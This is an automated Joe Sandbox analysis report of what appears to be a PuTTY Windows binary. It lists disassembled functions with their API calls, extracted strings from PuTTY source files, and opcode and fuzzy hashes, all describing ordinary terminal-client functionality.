                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c$IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX$S&pecial Command$nesting < 2
                    • API String ID: 1803796953-2735854202
                    • Opcode ID: bd33faf49b077e274f07e609f11f89a45a6f4f4ba2d6f3e7a194ca1ea156f17f
                    • Instruction ID: 304e701b90a2c1d2680b023f3c4f9b401c51ca9007863f92755224377fa4370a
                    • Opcode Fuzzy Hash: bd33faf49b077e274f07e609f11f89a45a6f4f4ba2d6f3e7a194ca1ea156f17f
                    • Instruction Fuzzy Hash: 7251F370B003086BE7245F18EC55F7E77E6EB94744F284569FA06AB2E1DEF1AC109B44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BDC330 Relevance: 28.1, APIs: 5, Strings: 11, Instructions: 146timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetCommState.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00BDC140,?), ref: 00BDC34C
                    • SetCommState.KERNEL32(00000000,?), ref: 00BDC48F
                    • SetCommTimeouts.KERNEL32(00000000), ref: 00BDC4C4
                    • GetLastError.KERNEL32 ref: 00BDC4D3
                      • Part of subcall function 00BECC90: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                      • Part of subcall function 00BECC90: _strlen.LIBCMT ref: 00BECD26
                    • GetLastError.KERNEL32 ref: 00BDC4EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Comm$ErrorLastState$FormatMessageTimeouts_strlen
                    • String ID: Configuring %s$Configuring %s flow control$Configuring %s parity$Configuring %u data bits$Configuring baud rate %lu$Configuring serial port: %s$Configuring serial timeouts: %s$DSR/DTR$Invalid number of stop bits (need 1, 1.5 or 2)$RTS/CTS$XON/XOFF
                    • API String ID: 617136254-604002008
                    • Opcode ID: 6a6b0670a6f712a0152c0d6949765ff728a9998e2b9206b4a9569dda53e888d4
                    • Instruction ID: bfeaf487e0d36951fbfb33b60e2668338f1a10a9b70d9c5b22e0dd529b96550b
                    • Opcode Fuzzy Hash: 6a6b0670a6f712a0152c0d6949765ff728a9998e2b9206b4a9569dda53e888d4
                    • Instruction Fuzzy Hash: FF41A3B1904342ABD700AF25EC56B2FBFE4AB55718F040479F949DA392F7358A148B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C00E70 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 240COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • No authority could be contacted for authentication.The domain name of the authenticating party could be wrong, the domain could be unreachable, or there might have been a trust relationship failure., xrefs: 00C00ED9
                    • Remote side closed network connection, xrefs: 00C012A6
                    • Remote side sent SSH2_MSG_EXT_INFO in bare connection protocol, xrefs: 00C012CB
                    • The handle passed to the function is invalid., xrefs: 00C00EAF
                    • One or more of the SecBufferDesc structures passed as an OUT parameter has a buffer that is too small., xrefs: 00C00E91
                    • Invalid packet length received, xrefs: 00C012B3
                    • The Local Security Authority cannot be contacted., xrefs: 00C00EBD
                    • The logon failed., xrefs: 00C00ECB
                    • The error is due to a malformed input token, such as a token corrupted in transit, a token of incorrect size, or a token passed into the wrong security package. Passing a token to the wrong package can happen if client and server did not negotiate the proper s, xrefs: 00C00EC4
                    • Internal SSPI error, xrefs: 00C00EA8
                    • The target was not recognized., xrefs: 00C00EB6
                    • Remote side unexpectedly closed network connection, xrefs: 00C012DA
                    • SSPI status OK, xrefs: 00C00E9F, 00C00EDE
                    • No credentials are available in the security package., xrefs: 00C00ED2
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: Internal SSPI error$Invalid packet length received$No authority could be contacted for authentication.The domain name of the authenticating party could be wrong, the domain could be unreachable, or there might have been a trust relationship failure.$No credentials are available in the security package.$One or more of the SecBufferDesc structures passed as an OUT parameter has a buffer that is too small.$Remote side closed network connection$Remote side sent SSH2_MSG_EXT_INFO in bare connection protocol$Remote side unexpectedly closed network connection$SSPI status OK$The Local Security Authority cannot be contacted.$The error is due to a malformed input token, such as a token corrupted in transit, a token of incorrect size, or a token passed into the wrong security package. Passing a token to the wrong package can happen if client and server did not negotiate the proper s$The handle passed to the function is invalid.$The logon failed.$The target was not recognized.
                    • API String ID: 4218353326-2735777550
                    • Opcode ID: 001ad68f60710a558c83fb7b2f65fb84d225d5610abd14789dd3c4cfbf442d31
                    • Instruction ID: 1ac0b867323f451dfacc00ab72856da02f8e434e8a2b6bbfb3523a829afa8724
                    • Opcode Fuzzy Hash: 001ad68f60710a558c83fb7b2f65fb84d225d5610abd14789dd3c4cfbf442d31
                    • Instruction Fuzzy Hash: 4491CDB5900602AFDB04DF19D845B25FBB1FF04314F188669F85A9B792E331E9A4CBD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BEC1D0 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 86libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNEL32(00000000,GetSecurityInfo), ref: 00BEC206
                    • GetProcAddress.KERNEL32(00000000,SetSecurityInfo), ref: 00BEC22C
                    • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00BEC252
                    • GetProcAddress.KERNEL32(00000000,GetTokenInformation), ref: 00BEC278
                    • GetProcAddress.KERNEL32(00000000,InitializeSecurityDescriptor), ref: 00BEC29A
                    • GetProcAddress.KERNEL32(00000000,SetSecurityDescriptorOwner), ref: 00BEC2B8
                    • GetProcAddress.KERNEL32(00000000,SetEntriesInAclA), ref: 00BEC2DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc
                    • String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetEntriesInAclA$SetSecurityDescriptorOwner$SetSecurityInfo$advapi32.dll
                    • API String ID: 190572456-1260934078
                    • Opcode ID: edab6ffb613021c78560baf860f460659a81da9abdebe0bb09daa7c2ed536a6c
                    • Instruction ID: b570f3d8153efe40e968caad0230b48df233294832374fd6ab26173dbf814d05
                    • Opcode Fuzzy Hash: edab6ffb613021c78560baf860f460659a81da9abdebe0bb09daa7c2ed536a6c
                    • Instruction Fuzzy Hash: 3D314CB07403D2ABDF059F36EC49B1E3FE8B701344F488668E402D26A2DB74D541CB26
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C16400 Relevance: 24.9, APIs: 9, Strings: 5, Instructions: 373COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=, xrefs: 00C16795, 00C1682B
                    • MD5:, xrefs: 00C164A6
                    • 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/, xrefs: 00C1648F
                    • 0123456789abcdefABCDEF:, xrefs: 00C164D4
                    • SHA256:, xrefs: 00C1647A
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strspn$_strlen
                    • String ID: 0123456789abcdefABCDEF:$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=$MD5:$SHA256:
                    • API String ID: 937825679-3738422337
                    • Opcode ID: 27ffe0c55cd69c6c69c49948f7c14091b6f806ebc9b15a69f64bae7b36866ed5
                    • Instruction ID: 8d3db4183a0ecacadadde10f6af375a89902ecc6d9b48db4171cad3f9e8e3eab
                    • Opcode Fuzzy Hash: 27ffe0c55cd69c6c69c49948f7c14091b6f806ebc9b15a69f64bae7b36866ed5
                    • Instruction Fuzzy Hash: 1CC10680F043A227FF37411444253BAAADA5B87B4CF1D824BD095866C6CAA59FD7E3D3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD45E0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 122registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegisterClassA.USER32 ref: 00BD467F
                    • GetSysColor.USER32(00000018), ref: 00BD4693
                    • GetSysColor.USER32(00000017), ref: 00BD469C
                    • SystemParametersInfoA.USER32(00000029,00000158,00000158,00000000), ref: 00BD46CD
                    • CreateFontIndirectA.GDI32(?), ref: 00BD46DB
                    • SetWindowTextA.USER32(00000000,?), ref: 00BD4705
                    • CreateCompatibleDC.GDI32(00000000), ref: 00BD4719
                    • _strlen.LIBCMT ref: 00BD4722
                    • GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00BD4732
                    • DeleteDC.GDI32(00000000), ref: 00BD4739
                    • GetWindowRect.USER32 ref: 00BD4743
                    • CreateWindowExA.USER32 ref: 00BD478D
                    • ShowWindow.USER32(00000000,00000004), ref: 00BD479B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$Create$ColorText$ClassCompatibleDeleteExtentFontIndirectInfoParametersPoint32RectRegisterShowSystem_strlen
                    • String ID: %dx%d
                    • API String ID: 816365731-2206825331
                    • Opcode ID: 1aab162344e559367c84d474e054221783f93c6f2a29dc64f63d3696ac8154c0
                    • Instruction ID: a434d4eaabc39ea11868359a0a7306e962bcd651b6b0632f804559021c1d249c
                    • Opcode Fuzzy Hash: 1aab162344e559367c84d474e054221783f93c6f2a29dc64f63d3696ac8154c0
                    • Instruction Fuzzy Hash: FF415CB1504300AFE714DF60DC49BAFBBF8EB89709F00491DF546972A0DB749948CB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BBAA80 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 97windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsZoomed.USER32 ref: 00BBAA95
                    • IsZoomed.USER32 ref: 00BBAABC
                    • GetWindowLongA.USER32 ref: 00BBAACE
                    • GetWindowLongA.USER32 ref: 00BBAAE7
                    • SetWindowLongA.USER32 ref: 00BBAB19
                    • GetDesktopWindow.USER32 ref: 00BBAB70
                    • GetClientRect.USER32(00000000), ref: 00BBAB7A
                    • SetWindowPos.USER32(00000000,00000000,?,?,?,00000020), ref: 00BBABA1
                    • CheckMenuItem.USER32(00000180,00000008), ref: 00BBABC1
                    • CheckMenuItem.USER32(00000180,00000008), ref: 00BBABD0
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c, xrefs: 00BBAAA4
                    • (, xrefs: 00BBAB3B
                    • IsZoomed(wgs.term_hwnd), xrefs: 00BBAAA9
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$Long$CheckItemMenuZoomed$ClientDesktopRect
                    • String ID: ($/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c$IsZoomed(wgs.term_hwnd)
                    • API String ID: 4021424604-596742920
                    • Opcode ID: 8f3afbcea6e0591830785901a26036f210359777f9fabf5b9b7d58854c817497
                    • Instruction ID: 8bfdd1a47c25b4f740c73092745846c47bdb4d58748195c1f6b90dac17397723
                    • Opcode Fuzzy Hash: 8f3afbcea6e0591830785901a26036f210359777f9fabf5b9b7d58854c817497
                    • Instruction Fuzzy Hash: 00318BB0A04200AFDB14AF24EC4AF6E3BE4EB48714F144A18F856932B0EB70AC00DB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD4C60 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 163COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BF9440: GetLocalTime.KERNEL32(?,?,?,?,00BD4A24,?), ref: 00BF9456
                    • _strftime.LIBCMT ref: 00BD4CE8
                      • Part of subcall function 00BD5470: _strlen.LIBCMT ref: 00BD549D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: LocalTime_strftime_strlen
                    • String ID: %Y.%m.%d %H:%M:%S$%s session log (%s mode) to file: %s$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/logging.c$=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=$Appending$Disabled writing$Error writing$SSH raw data$Writing new$ctx->state != L_OPENING$unknown
                    • API String ID: 4241967358-3602227895
                    • Opcode ID: 730b0f5fa153b190d208e6c258b7f395dbaf248d133989b076eafceebf64b151
                    • Instruction ID: 67539a26e2600a2d41c829d6b58729fa9b23330f48f7441723e291a4ffe61131
                    • Opcode Fuzzy Hash: 730b0f5fa153b190d208e6c258b7f395dbaf248d133989b076eafceebf64b151
                    • Instruction Fuzzy Hash: 0341C8F59003045BDF24AB20DC86B6BB3E5EB85308F14497DE88A47342FB72AD58C752
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BE4440 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BEB9B0: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00BEBA26
                      • Part of subcall function 00BEB9B0: RegCloseKey.ADVAPI32(?), ref: 00BEBA6A
                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00BE44E9
                      • Part of subcall function 00BE4AC0: CreateFileA.KERNEL32(00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,00BE4659), ref: 00BE4AFB
                    • GetEnvironmentVariableA.KERNEL32(HOMEDRIVE,?,00000104), ref: 00BE45B3
                    • GetEnvironmentVariableA.KERNEL32(HOMEPATH,?,00000104), ref: 00BE45C6
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BE462E
                      • Part of subcall function 00BEBBF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00BE4481,00000000,RandSeedFile), ref: 00BEBC17
                      • Part of subcall function 00BEBBF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00BEBC4F
                      • Part of subcall function 00BEBA90: RegCloseKey.ADVAPI32(00000000,00BE448C,00000000), ref: 00BEBA94
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CloseCreateEnvironmentQueryValueVariable$AddressDirectoryFileProcWindows
                    • String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$shell32.dll
                    • API String ID: 1153880102-1528239033
                    • Opcode ID: fc16f5a696c1dc49b1ec788e57b9d9b7f339852b6beea05771677837b6edafd8
                    • Instruction ID: 372cacddb51756f6c5be0655f7963370faac0a683adf3f34eb8ab2e7ee574f27
                    • Opcode Fuzzy Hash: fc16f5a696c1dc49b1ec788e57b9d9b7f339852b6beea05771677837b6edafd8
                    • Instruction Fuzzy Hash: 79511AB1B843842BFA2066666C4BF7B32D9CB55718F0804B4F94A973C2FFA599048297
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C22560 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 315COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: host$pass$port$proxyhost$proxyport$user
                    • API String ID: 0-3129514663
                    • Opcode ID: 3bafffedddae2dc47bc3a2d65059b268bc5ff00062b0a0a051ac9e73f6d8eb67
                    • Instruction ID: 705783e071c55ebdd785f874d214b447df9f51bc1d00547894b4c003f43b9623
                    • Opcode Fuzzy Hash: 3bafffedddae2dc47bc3a2d65059b268bc5ff00062b0a0a051ac9e73f6d8eb67
                    • Instruction Fuzzy Hash: 95A16772948320BBE6306A21FC83BBB7BE0DF50750F044429FD89962D2F7369A15D692
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C108A0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 117COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: %s$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/utils/backend_socket_log.c$Connected to %s$Connecting to %s$Connecting to %s port %d$Failed to connect to %s: %s$len >= 2$ost$te h
                    • API String ID: 4218353326-3821570074
                    • Opcode ID: 9ce47ee80fff5e22fa56ee4c14ddd5f9b26e8e8a0978205a3c00058e260667f2
                    • Instruction ID: dc9788c7987e45847554139690bdbe1a567608ef3b7f617cf5b190236889656c
                    • Opcode Fuzzy Hash: 9ce47ee80fff5e22fa56ee4c14ddd5f9b26e8e8a0978205a3c00058e260667f2
                    • Instruction Fuzzy Hash: EE31FBB5E443807BD6306A11AC57FEF3AA8DF8B758F140428F88956243EBB15994D2A3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB6CB0 Relevance: 16.7, APIs: 11, Instructions: 181COMMON
                    Download Yara Rule
                    APIs
                    • CreatePen.GDI32(00000000,00000000), ref: 00BB6D98
                    • SelectObject.GDI32(00000000), ref: 00BB6DA5
                    • MoveToEx.GDI32(?,?,00000000), ref: 00BB6DB8
                    • LineTo.GDI32(00000000,00000001), ref: 00BB6DD4
                    • SelectObject.GDI32 ref: 00BB6DE3
                    • CreatePen.GDI32(00000000,00000000), ref: 00BB6E41
                    • SelectObject.GDI32(00000000), ref: 00BB6E54
                    • Polyline.GDI32(?,00000005), ref: 00BB6E65
                    • SelectObject.GDI32(00000000), ref: 00BB6E72
                    • DeleteObject.GDI32(00000000), ref: 00BB6E75
                    • SetPixel.GDI32(?,?), ref: 00BB6F18
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Object$Select$Create$DeleteLineMovePixelPolyline
                    • String ID:
                    • API String ID: 1020918164-0
                    • Opcode ID: 47a22513e5b34bfd84b5ba501d4e344fdbb59ac4a56699f88126c14c43602a73
                    • Instruction ID: 2f58804c2c370ed654a8a10baac950001d6ffb958572acc022a9078245ab7171
                    • Opcode Fuzzy Hash: 47a22513e5b34bfd84b5ba501d4e344fdbb59ac4a56699f88126c14c43602a73
                    • Instruction Fuzzy Hash: 41619C71904304AFE7109F15DD94BAABBE9FF88314F584629FD9697260C7B5AC40CF81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD4344 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 204comCOMMON
                    Download Yara Rule
                    APIs
                    • _strrchr.LIBCMT ref: 00BD435C
                    • _strrchr.LIBCMT ref: 00BD436F
                    • CoCreateInstance.OLE32(00C7E964,00000000,00000001,00C7E954,?), ref: 00BD4416
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strrchr$CreateInstance
                    • String ID: %.*s%s$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/jump-list.c$Connect to PuTTY session '$Run %.*s$appname$j\h
                    • API String ID: 3526010480-2179536349
                    • Opcode ID: d06325c040096ddaec29c19db7f8aca5f3c0409b8d5f807e3544533ef400ca1a
                    • Instruction ID: 156c366adf9060e5afd35da78277adc84851fb122575f680fec3a7ec0d461e78
                    • Opcode Fuzzy Hash: d06325c040096ddaec29c19db7f8aca5f3c0409b8d5f807e3544533ef400ca1a
                    • Instruction Fuzzy Hash: 3951E9F5A443416BDA10AF619C8BF1BB6D8AF94708F144878F909A7342EB71D909C6A3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BE4050 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BEB9B0: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00BEBA26
                      • Part of subcall function 00BEB9B0: RegCloseKey.ADVAPI32(?), ref: 00BEBA6A
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                      • Part of subcall function 00BEBBF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00BE4481,00000000,RandSeedFile), ref: 00BEBC17
                      • Part of subcall function 00BEBBF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00BEBC4F
                    • _strlen.LIBCMT ref: 00BE40C4
                      • Part of subcall function 00BEBCF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00BE4743,00000000,Recent sessions), ref: 00BEBD16
                      • Part of subcall function 00BEBCF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00BEBD4D
                      • Part of subcall function 00C10FB0: _strlen.LIBCMT ref: 00C10FC6
                    • _strlen.LIBCMT ref: 00BE40EE
                    Strings
                    Memory Dump Source
